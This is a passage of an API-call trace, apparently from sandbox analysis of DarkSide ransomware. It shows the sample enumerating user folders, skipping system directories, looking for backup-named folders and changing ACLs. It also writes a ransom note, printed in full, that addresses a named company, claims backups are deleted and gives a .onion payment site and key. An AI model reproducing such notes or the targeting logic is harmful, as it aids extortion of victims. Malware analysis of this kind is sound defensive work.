0xa9e531d9 [0149.170] RtlComputeCrc32 (PartialCrc=0x31d9, Buffer=0x2690094, Length=0x80) returned 0xca4d137a [0149.170] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0149.170] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1ef010) returned 1 [0149.171] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1ff018) returned 1 [0149.171] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.171] FindClose (in: hFindFile=0x152f98 | out: hFindFile=0x152f98) returned 1 [0149.171] _wcsicmp (_Str1="backup", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0149.171] wcslen (_String="backup") returned 0x6 [0149.171] _wcsicmp (_Str1="bak", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0149.171] wcslen (_String="bak") returned 0x3 [0149.171] _wcsicmp (_Str1="back", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0149.171] wcslen (_String="back") returned 0x4 [0149.171] _wcsicmp (_Str1="archive", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0149.171] wcslen (_String="archive") returned 0x7 [0149.171] _wcsicmp (_Str1="bckp", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0149.172] wcslen (_String="bckp") returned 0x4 [0149.172] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1beff8) returned 1 [0149.173] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1cf000) returned 1 [0149.173] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8699dd40, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8699dd40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x869c3ea0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.173] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.173] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.173] FindClose (in: hFindFile=0x152f58 | out: hFindFile=0x152f58) returned 1 [0149.173] _wcsicmp (_Str1="backup", _Str2="Recovery") returned -16 [0149.174] wcslen (_String="backup") returned 0x6 [0149.174] _wcsicmp (_Str1="bak", _Str2="Recovery") returned -16 [0149.174] wcslen (_String="bak") returned 0x3 [0149.174] _wcsicmp (_Str1="back", _Str2="Recovery") returned -16 [0149.174] wcslen (_String="back") returned 0x4 [0149.174] _wcsicmp (_Str1="archive", _Str2="Recovery") returned -17 [0149.174] wcslen (_String="archive") returned 0x7 [0149.174] _wcsicmp (_Str1="bckp", _Str2="Recovery") returned -16 [0149.174] wcslen (_String="bckp") returned 0x4 [0149.174] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x18efe0) returned 1 [0149.174] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x19efe8) returned 1 [0149.176] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x86195300, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x86195300, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0149.176] _wcsicmp (_Str1="$recycle.bin", _Str2="System Volume Information") returned -79 [0149.176] wcslen (_String="$recycle.bin") returned 0xc [0149.176] _wcsicmp (_Str1="config.msi", _Str2="System Volume Information") returned -16 [0149.176] wcslen (_String="config.msi") returned 0xa [0149.176] _wcsicmp (_Str1="$windows.~bt", _Str2="System Volume Information") returned -79 [0149.176] wcslen (_String="$windows.~bt") returned 0xc [0149.176] _wcsicmp (_Str1="$windows.~ws", _Str2="System Volume Information") returned -79 [0149.176] wcslen (_String="$windows.~ws") returned 0xc [0149.176] _wcsicmp (_Str1="windows", _Str2="System Volume Information") returned 4 [0149.176] wcslen (_String="windows") returned 0x7 [0149.176] _wcsicmp (_Str1="appdata", _Str2="System Volume Information") returned -18 [0149.176] wcslen (_String="appdata") returned 0x7 [0149.176] _wcsicmp (_Str1="application data", _Str2="System Volume Information") returned -18 [0149.176] wcslen (_String="application data") returned 0x10 [0149.176] _wcsicmp (_Str1="boot", _Str2="System Volume Information") returned -17 [0149.176] wcslen (_String="boot") returned 0x4 [0149.176] _wcsicmp (_Str1="google", _Str2="System Volume Information") returned -12 [0149.176] wcslen (_String="google") returned 0x6 [0149.176] _wcsicmp (_Str1="mozilla", _Str2="System Volume Information") returned -6 [0149.176] wcslen (_String="mozilla") returned 0x7 [0149.176] _wcsicmp (_Str1="program files", _Str2="System Volume Information") returned -3 [0149.176] wcslen (_String="program files") returned 0xd [0149.176] _wcsicmp (_Str1="program files (x86)", _Str2="System Volume Information") returned -3 [0149.176] wcslen (_String="program files (x86)") returned 0x13 [0149.176] _wcsicmp (_Str1="programdata", _Str2="System Volume Information") returned -3 [0149.176] wcslen (_String="programdata") returned 0xb [0149.177] _wcsicmp (_Str1="system volume information", _Str2="System Volume Information") returned 0 [0149.177] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0149.177] _wcsicmp (_Str1="$recycle.bin", _Str2="Users") returned -81 [0149.177] wcslen (_String="$recycle.bin") returned 0xc [0149.177] _wcsicmp (_Str1="config.msi", _Str2="Users") returned -18 [0149.177] wcslen (_String="config.msi") returned 0xa [0149.177] _wcsicmp (_Str1="$windows.~bt", _Str2="Users") returned -81 [0149.177] wcslen (_String="$windows.~bt") returned 0xc [0149.177] _wcsicmp (_Str1="$windows.~ws", _Str2="Users") returned -81 [0149.177] wcslen (_String="$windows.~ws") returned 0xc [0149.177] _wcsicmp (_Str1="windows", _Str2="Users") returned 2 [0149.177] wcslen (_String="windows") returned 0x7 [0149.177] _wcsicmp (_Str1="appdata", _Str2="Users") returned -20 [0149.177] wcslen (_String="appdata") returned 0x7 [0149.177] _wcsicmp (_Str1="application data", _Str2="Users") returned -20 [0149.177] wcslen (_String="application data") returned 0x10 [0149.177] _wcsicmp (_Str1="boot", _Str2="Users") returned -19 [0149.177] wcslen (_String="boot") returned 0x4 [0149.177] _wcsicmp (_Str1="google", _Str2="Users") returned -14 [0149.177] wcslen (_String="google") returned 0x6 [0149.177] _wcsicmp (_Str1="mozilla", _Str2="Users") returned -8 [0149.177] wcslen (_String="mozilla") returned 0x7 [0149.177] _wcsicmp (_Str1="program files", _Str2="Users") returned -5 [0149.177] wcslen (_String="program files") returned 0xd [0149.177] _wcsicmp (_Str1="program files (x86)", _Str2="Users") returned -5 [0149.177] wcslen (_String="program files (x86)") returned 0x13 [0149.177] _wcsicmp (_Str1="programdata", _Str2="Users") returned -5 [0149.177] wcslen (_String="programdata") returned 0xb [0149.177] _wcsicmp (_Str1="system volume information", _Str2="Users") returned -2 [0149.177] wcslen (_String="system volume information") returned 0x19 [0149.177] _wcsicmp (_Str1="tor browser", _Str2="Users") returned -1 [0149.177] wcslen (_String="tor browser") returned 0xb [0149.177] _wcsicmp (_Str1="windows.old", _Str2="Users") returned 2 [0149.177] wcslen (_String="windows.old") returned 0xb [0149.177] _wcsicmp (_Str1="intel", _Str2="Users") returned -12 [0149.177] wcslen (_String="intel") returned 0x5 [0149.178] _wcsicmp (_Str1="msocache", _Str2="Users") returned -8 [0149.178] wcslen (_String="msocache") returned 0x8 [0149.178] _wcsicmp (_Str1="perflogs", _Str2="Users") returned -5 [0149.178] wcslen (_String="perflogs") returned 0x8 [0149.178] _wcsicmp (_Str1="x64dbg", _Str2="Users") returned 3 [0149.178] wcslen (_String="x64dbg") returned 0x6 [0149.178] _wcsicmp (_Str1="public", _Str2="Users") returned -5 [0149.178] wcslen (_String="public") returned 0x6 [0149.178] _wcsicmp (_Str1="all users", _Str2="Users") returned -20 [0149.178] wcslen (_String="all users") returned 0x9 [0149.178] _wcsicmp (_Str1="default", _Str2="Users") returned -17 [0149.178] wcslen (_String="default") returned 0x7 [0149.178] wcscpy (in: _Dest=0x1661c8, _Source="\\\\?\\C:\\*" | out: _Dest="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0149.178] wcslen (_String="\\\\?\\C:\\*") returned 0x8 [0149.178] wcscpy (in: _Dest=0x1661d6, _Source="Users" | out: _Dest="Users") returned="Users" [0149.178] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x18efe0 [0149.178] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x19efe8 [0149.180] wcscpy (in: _Dest=0x18efe0, _Source="\\\\?\\C:\\Users" | out: _Dest="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0149.180] GetNamedSecurityInfoW () returned 0x0 [0149.180] SetEntriesInAclW () returned 0x0 [0149.180] SetNamedSecurityInfoW () returned 0x0 [0150.730] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x141a50) returned 1 [0150.730] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f06c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.730] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users" (normalized: "c:\\users")) returned 1 [0150.731] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0150.731] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0150.731] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32f03c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32f03c*=0x7ca, lpOverlapped=0x0) returned 1 [0150.732] CloseHandle (hObject=0x1c) returned 1 [0150.732] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users" (normalized: "c:\\users")) returned 0x11 [0150.732] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users" | out: pszPath="\\\\?\\C:\\Users\\") returned="" [0150.732] wcslen (_String="\\\\?\\C:\\Users\\") returned 0xd [0150.732] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\*", fInfoLevelId=0x0, lpFindFileData=0x32f29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32f29c) returned 0x152f58 [0150.732] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x878a4820, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x878a4820, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.733] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0150.733] _wcsicmp (_Str1="$recycle.bin", _Str2="5p5NrGJn0jS HALPmcxz") returned -17 [0150.733] wcslen (_String="$recycle.bin") returned 0xc [0150.733] _wcsicmp (_Str1="config.msi", _Str2="5p5NrGJn0jS HALPmcxz") returned 46 [0150.733] wcslen (_String="config.msi") returned 0xa [0150.733] _wcsicmp (_Str1="$windows.~bt", _Str2="5p5NrGJn0jS HALPmcxz") returned -17 [0150.734] wcslen (_String="$windows.~bt") returned 0xc [0150.734] _wcsicmp (_Str1="$windows.~ws", _Str2="5p5NrGJn0jS HALPmcxz") returned -17 [0150.734] wcslen (_String="$windows.~ws") returned 0xc [0150.734] _wcsicmp (_Str1="windows", _Str2="5p5NrGJn0jS HALPmcxz") returned 66 [0150.734] wcslen (_String="windows") returned 0x7 [0150.734] _wcsicmp (_Str1="appdata", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0150.734] wcslen (_String="appdata") returned 0x7 [0150.734] _wcsicmp (_Str1="application data", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0150.734] wcslen (_String="application data") returned 0x10 [0150.734] _wcsicmp (_Str1="boot", _Str2="5p5NrGJn0jS HALPmcxz") returned 45 [0150.734] wcslen (_String="boot") returned 0x4 [0150.734] _wcsicmp (_Str1="google", _Str2="5p5NrGJn0jS HALPmcxz") returned 50 [0150.734] wcslen (_String="google") returned 0x6 [0150.734] _wcsicmp (_Str1="mozilla", _Str2="5p5NrGJn0jS HALPmcxz") returned 56 [0150.734] wcslen (_String="mozilla") returned 0x7 [0150.734] _wcsicmp (_Str1="program files", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0150.734] wcslen (_String="program files") returned 0xd [0150.734] _wcsicmp (_Str1="program files (x86)", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0150.734] wcslen (_String="program files (x86)") returned 0x13 [0150.734] _wcsicmp (_Str1="programdata", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0150.734] wcslen (_String="programdata") returned 0xb [0150.734] _wcsicmp (_Str1="system volume information", _Str2="5p5NrGJn0jS HALPmcxz") returned 62 [0150.734] wcslen (_String="system volume information") returned 0x19 [0150.734] _wcsicmp (_Str1="tor browser", _Str2="5p5NrGJn0jS HALPmcxz") returned 63 [0150.734] wcslen (_String="tor browser") returned 0xb [0150.734] _wcsicmp (_Str1="windows.old", _Str2="5p5NrGJn0jS HALPmcxz") returned 66 [0150.734] wcslen (_String="windows.old") returned 0xb [0150.734] _wcsicmp (_Str1="intel", _Str2="5p5NrGJn0jS HALPmcxz") returned 52 [0150.734] wcslen (_String="intel") returned 0x5 [0150.734] _wcsicmp (_Str1="msocache", _Str2="5p5NrGJn0jS HALPmcxz") returned 56 [0150.734] wcslen (_String="msocache") returned 0x8 [0150.734] _wcsicmp (_Str1="perflogs", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0150.734] wcslen (_String="perflogs") returned 0x8 [0150.734] _wcsicmp (_Str1="x64dbg", _Str2="5p5NrGJn0jS HALPmcxz") returned 67 [0150.734] wcslen (_String="x64dbg") returned 0x6 [0150.734] _wcsicmp (_Str1="public", _Str2="5p5NrGJn0jS HALPmcxz") returned 59 [0150.735] wcslen (_String="public") returned 0x6 [0150.735] _wcsicmp (_Str1="all users", _Str2="5p5NrGJn0jS HALPmcxz") returned 44 [0150.735] wcslen (_String="all users") returned 0x9 [0150.735] _wcsicmp (_Str1="default", _Str2="5p5NrGJn0jS HALPmcxz") returned 47 [0150.735] wcslen (_String="default") returned 0x7 [0150.735] wcscpy (in: _Dest=0x19efe8, _Source="\\\\?\\C:\\Users\\*" | out: _Dest="\\\\?\\C:\\Users\\*") returned="\\\\?\\C:\\Users\\*" [0150.735] wcslen (_String="\\\\?\\C:\\Users\\*") returned 0xe [0150.735] wcscpy (in: _Dest=0x19f002, _Source="5p5NrGJn0jS HALPmcxz" | out: _Dest="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0150.735] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1c0ff8 [0150.735] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1d1000 [0150.737] wcscpy (in: _Dest=0x1c0ff8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0150.737] GetNamedSecurityInfoW () returned 0x0 [0150.737] SetEntriesInAclW () returned 0x0 [0150.737] SetNamedSecurityInfoW () returned 0x0 [0155.443] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x154130) returned 1 [0155.443] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32edec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.443] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 1 [0155.443] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0155.443] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0155.444] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32edbc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32edbc*=0x7ca, lpOverlapped=0x0) returned 1 [0155.445] CloseHandle (hObject=0x1c) returned 1 [0155.445] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0155.446] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="" [0155.446] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x22 [0155.446] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", fInfoLevelId=0x0, lpFindFileData=0x32f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32f01c) returned 0x152f98 [0155.446] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a592760, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8a592760, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.447] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0155.447] _wcsicmp (_Str1="$recycle.bin", _Str2="AppData") returned -61 [0155.447] wcslen (_String="$recycle.bin") returned 0xc [0155.447] _wcsicmp (_Str1="config.msi", _Str2="AppData") returned 2 [0155.447] wcslen (_String="config.msi") returned 0xa [0155.447] _wcsicmp (_Str1="$windows.~bt", _Str2="AppData") returned -61 [0155.447] wcslen (_String="$windows.~bt") returned 0xc [0155.447] _wcsicmp (_Str1="$windows.~ws", _Str2="AppData") returned -61 [0155.447] wcslen (_String="$windows.~ws") returned 0xc [0155.447] _wcsicmp (_Str1="windows", _Str2="AppData") returned 22 [0155.447] wcslen (_String="windows") returned 0x7 [0155.447] _wcsicmp (_Str1="appdata", _Str2="AppData") returned 0 [0155.448] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0155.448] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0155.448] _wcsicmp (_Str1="$recycle.bin", _Str2="Contacts") returned -63 [0155.448] wcslen (_String="$recycle.bin") returned 0xc [0155.448] _wcsicmp (_Str1="config.msi", _Str2="Contacts") returned -14 [0155.448] wcslen (_String="config.msi") returned 0xa [0155.448] _wcsicmp (_Str1="$windows.~bt", _Str2="Contacts") returned -63 [0155.448] wcslen (_String="$windows.~bt") returned 0xc [0155.448] _wcsicmp (_Str1="$windows.~ws", _Str2="Contacts") returned -63 [0155.448] wcslen (_String="$windows.~ws") returned 0xc [0155.448] _wcsicmp (_Str1="windows", _Str2="Contacts") returned 20 [0155.448] wcslen (_String="windows") returned 0x7 [0155.448] _wcsicmp (_Str1="appdata", _Str2="Contacts") returned -2 [0155.448] wcslen (_String="appdata") returned 0x7 [0155.448] _wcsicmp (_Str1="application data", _Str2="Contacts") returned -2 [0155.448] wcslen (_String="application data") returned 